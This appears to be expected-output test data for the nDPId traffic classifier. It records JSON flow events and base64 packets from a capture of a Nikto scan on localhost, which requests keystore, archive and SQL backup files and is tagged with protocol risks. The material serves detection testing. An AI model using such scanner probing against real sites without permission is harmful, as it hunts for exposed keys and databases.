-01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277306,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277307,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":1,"flow_last_seen":1576420277307,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277307,"pkt":"AAAAAAAAAAAAAAAACABFAADBE+BAAEAGKFV\/AAABfwAAAcSoH5A\/FCtx8eapa4AYAED+tQAAAQEICp1m\/WOdZv1jR0VUIC8xMjcwMC5qa3MgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277307,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277308,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":1,"flow_last_seen":1576420277308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277308,"pkt":"AAAAAAAAAAAAAAAACABFAADBd5tAAEAGxJl\/AAABfwAAAcSqH5Asxk83LE5RU4AYAED+tQAAAQEICp1m\/WSdZv1kR0VUIC8xMjcwMC5lZ2cgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277308,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":1,"flow_last_seen":1576420277309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277309,"pkt":"AAAAAAAAAAAAAAAACABFAADB9HRAAEAGR8B\/AAABfwAAAcSsH5BlTMzeEpcpJ4AYAED+tQAAAQEICp1m\/WWdZv1lR0VUIC8xMjcwMC5lZ2cgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277310,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":1,"flow_last_seen":1576420277310,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277310,"pkt":"AAAAAAAAAAAAAAAACABFAADFcQdAAEAGyyl\/AAABfwAAAcSuH5C\/jUmrZ8IhxYAYAED+uQAAAQEICp1m\/WadZv1mR0VUIC8xMjdfMF8wXzEudGFyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277310,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277311,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":1,"flow_last_seen":1576420277311,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277311,"pkt":"AAAAAAAAAAAAAAAACABFAADFdZ1AAEAGxpN\/AAABfwAAAcSwH5BGIE0sZXhTqYAYAED+uQAAAQEICp1m\/WedZv1nR0VUIC8xMjdfMF8wXzEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277311,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":1,"flow_last_seen":1576420277313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277313,"pkt":"AAAAAAAAAAAAAAAACABFAADESF9AAEAG89J\/AAABfwAAAcSyH5CXAnDudCS+HoAYAED+uAAAAQEICp1m\/WmdZv1oR0VUIC8xMjcwMC50YXIuZ3ogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277314,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":1,"flow_last_seen":1576420277314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277314,"pkt":"AAAAAAAAAAAAAAAACABFAADEBf5AAEAGNjR\/AAABfwAAAcS0H5ApMj1NA0MOSIAYAED+uAAAAQEICp1m\/WqdZv1qR0VUIC8xMjcwMC50YXIuZ3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} 
-01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277314,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277315,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":1,"flow_last_seen":1576420277315,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277315,"pkt":"AAAAAAAAAAAAAAAACABFAADC35NAAEAGXKB\/AAABfwAAAcS2H5BI6+ciGxVy6IAYAED+tgAAAQEICp1m\/WudZv1rR0VUIC8xLnRhci5sem1hIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277315,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277317,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":1,"flow_last_seen":1576420277317,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277317,"pkt":"AAAAAAAAAAAAAAAACABFAADCBO9AAEAGN0V\/AAABfwAAAcS4H5BQkTxdjeN4aIAYAED+tgAAAQEICp1m\/W2dZv1tR0VUIC8xLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277317,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277319,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":1,"flow_last_seen":1576420277319,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277319,"pkt":"AAAAAAAAAAAAAAAACABFAADAyGZAAEAGc89\/AAABfwAAAcS6H5BukfDWpxxv14AYAED+tAAAAQEICp1m\/W+dZv1vR0VUIC9zaXRlLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277319,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277321,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
